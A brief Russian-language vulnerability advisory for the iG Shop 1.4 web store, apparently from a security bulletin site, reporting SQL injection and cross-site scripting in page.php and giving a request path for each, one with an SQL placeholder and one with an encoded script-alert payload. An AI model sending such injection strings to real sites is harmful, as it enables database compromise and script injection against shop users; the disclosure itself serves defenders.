Программа: iG Shop 1.4 

Уязвимость обнаружена в iG Shop. Удаленный атакующий может выполнить XSS нападение и нападение SQL инъекции. 

1. SQL инъекция: 

page.php?page_type=catalog_products&type_id[] ='[SQL Injection]&SESSION_ID={SESSION_ID}
&SESSION_ID=

2. XSS нападение: 

page.php?page_type=catalog_products&type _id[]=%3Cscript%3Ealert(document.domain);
%3C/script%3E&SESSION_ID ={SESSION_ID}&SESSION_ID=

Оставить мнение